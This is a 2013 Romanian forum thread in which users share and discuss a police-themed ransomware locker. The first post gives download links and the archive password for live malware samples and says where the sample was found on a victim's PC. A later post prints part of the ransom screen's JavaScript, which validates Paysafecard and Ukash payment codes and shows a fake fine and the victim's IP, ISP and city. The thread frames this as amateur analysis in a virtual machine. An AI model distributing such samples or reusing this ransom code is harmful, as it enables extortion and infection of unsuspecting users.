Maximus Posted October 15, 2013 Report Posted October 15, 2013 (edited) Nu stiu daca a mai fost postat, dar stiu ca cineva a cerut o copie , am cautat inainte sa postez dar nu am gasit nici un link de download ...Download Link : https://www.dropbox.com/s/an1e3xskyu8kybe/DnceUUyu.rarParola arhiva : aMARE GRIJA PENTRU AMATORI ! RULATI IN MASINA VIRTUALA, DACA IL EXECUTATI IN PC VA MANCATI SINGURI !!!!La scurt timp s-a instalat si asta : https://www.dropbox.com/s/ssbsr5bx7pb3ngk/testzo.rarparola este tot aCum am dat de el :M-a sunat unu si mi-a explicat ca-l are, m-am chinuit cu un Live CD si l-am cauta prin compu lui vreo 2 ore pana l-am gasit in folderul Startup c:\users\costy\Start Menu\Startup\ , am zis ca-i mai sofisticat si la inceput l-am cautat prin Program data,temp etc .. el era in Startup ... plm a meritat efortul de dragul forumului. Partea cea mai funny e ca live cd-u era cu XP si puteam sa accesez doar cmd-ul, dar a meritat (live cd facut cu BartPE) Screen : https://www.dropbox.com/s/a8v1m8nbdrkww73/Untitled.jpg Edited October 15, 2013 by Maximus Quote
zoondark Posted October 16, 2013 Report Posted October 16, 2013 Stiu ca intr-un timp aparuse unul care trebuia sa bagi un cod de cartela reincarcabila de nu stiu cati euro pentru a-ti putea debloca pc-ul. Quote
yo20063 Posted October 16, 2013 Report Posted October 16, 2013 Super tare! Ce repede s-a instalat! Abia astept sa-l analizez....de data asta mi-am pus si un meterpreter la startup inainte, sa am o perspectiva si din afara. Good job! Quote
sulea Posted October 23, 2013 Report Posted October 23, 2013 o portiune din virus:JScript - window script block function $(id) {return document.getElementById(id);} function ClickBtn(BtnName) { var objClick = $(BtnName); if(objClick.setActive) objClick.setActive(); objClick.click(); } function RepeatSymbol(n,symbol) { var result = ""; for (var i=0; i<n;i++) result += symbol; return result; } function Validation(paycode, system) { if(system == "psk") { if(paycode.length != 16 || paycode.match("/^\d+$/")) return false; if (paycode.charAt(0) != "0") return false; for(var j = 0; j <= 9;j++) if (paycode.indexOf(RepeatSymbol(5, j)) != -1) return false; if(paycode.match("1234567")) return false; return true; } else if (system == "ukash") { if(paycode.length != 19 || paycode.match("/^\d+$/")) return false; if(paycode.substr(0,6) != "633718") return false; for(var j = 0; j <= 9;j++) if (paycode.indexOf(RepeatSymbol(5, j)) != -1) return false; if(paycode.match("1234567")) return false; return true; } return false; } function SetStatus(statustextid) { var statustext = ""; switch(statustextid) { case 0: statustext = "Pentru a debloca computerul, i pentru a evita alte consecine juridice, vi se cere s plteasc o amend de 300 RON"; break; case 1: statustext = "Cod facturare incorect"; $('ukash_number').value=""; $('psk_number').value=""; $('DirtyPayCode').value = ""; alert("Ai introdus un cod de facturare greit. Verificai datele i repetai procesul de"); break; case 2: statustext = "Codul de facturare prezentat pentru examinare. În mod normal, este nevoie de 3-4 ore. Poate fi o întârziere de pân la 48 de ore"; break; case 3: statustext = "CODUL FACTURARE anulat. Poate c codul de facturare a expirat sau fost transferate ctre pri tere"; break; case 4: statustext = "Cod facturare incorect"; break; case 5: statustext = "Încearc s se conecteze la server"; break; case 6: statustext = "Nu a reuit s se conecteze la server"; break; case 7: statustext = "Codul este corect. Sistemul va fi deblocat"; break; default: statustext = "Rspunsul eroare de la server"; break; } $('Status').innerHTML = statustext; } function SetPayInfo(payinfo) { var infoArr = payinfo.split("_"); if(infoArr.length == 3) { if(infoArr[2] == "psk") { $('psk_number').value = infoArr[0]; ClickBtn('Button_PSK'); } else if (infoArr[2] == "ukash") { $('ukash_number').value = infoArr[0]; ClickBtn('Button_UKASH'); } } } function SetPersonalInfo(info) { var infoArr = info.split("_"); for(i=0; i < infoArr.length;i++) { if(!infoArr[i].length) continue; switch(i) { case 0: var ip_collection = document.getElementsByName('personal_ip'); for(k=0; k < ip_collection.length; k++) ip_collection[k].innerHTML = infoArr[i]; break; case 1: $("personal_isp").innerHTML = infoArr[i]; break; case 2: $("personal_city").innerHTML = infoArr[i]; break; case 3: $("personal_city").innerHTML += "/"+infoArr[i]; break; } } } function EnterPayCode(paycode, payamount, paysystem) { $('DirtyPayCode').value = ""; if(paycode.length == 0) {SetStatus(0); return false;} if(!Validation(paycode, paysystem)) {SetStatus(1); return false;} $('DirtyPayCode').value = paycode+"_"+payamount+"_"+paysystem; SetStatus(5); return true; } function VirtualKeyboard(inputid, key) { $(inputid).value+=key; } // this functions uses only in landing function isEmpty(str) { return (!str || 0 === str.length); } if (!Date.prototype.getFullYear) { Date.prototype.getFullYear = function() { var yy=this.getYear(); return (yy<1900?yy+1900:yy); } ; } function SetCurrentDateTime() { function pad(n) {return n<10 ? '0'+n : n} var monthNames = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]; var now = new Date(); now.setMinutes(now.getMinutes()-8); date = //pad(now.getDate())+'/' "" + pad(monthNames[now.getMonth()]) +'/'+ pad(now.getFullYear()) //+' '+ pad(now.getHours()) //+':'+ pad(now.getMinutes()) //+':'+ pad(now.getSeconds()); //+' '+ now.getTimezoneOffset(); var date_collection = document.getElementsByName('date'); for(k=0; k < date_collection.length; k++) date_collection[k].innerHTML = date; } Quote
APIx00E00 Posted October 23, 2013 Report Posted October 23, 2013 o portiune din virus:Daca se poate sefu' baga tot source-ul. Quote
Gotyc Posted October 24, 2013 Report Posted October 24, 2013 Eu nu`i inteleg pe unii de ce nu au antivirus.. am dat sa deschid arhiva deja la vazut blackdoor ) Quote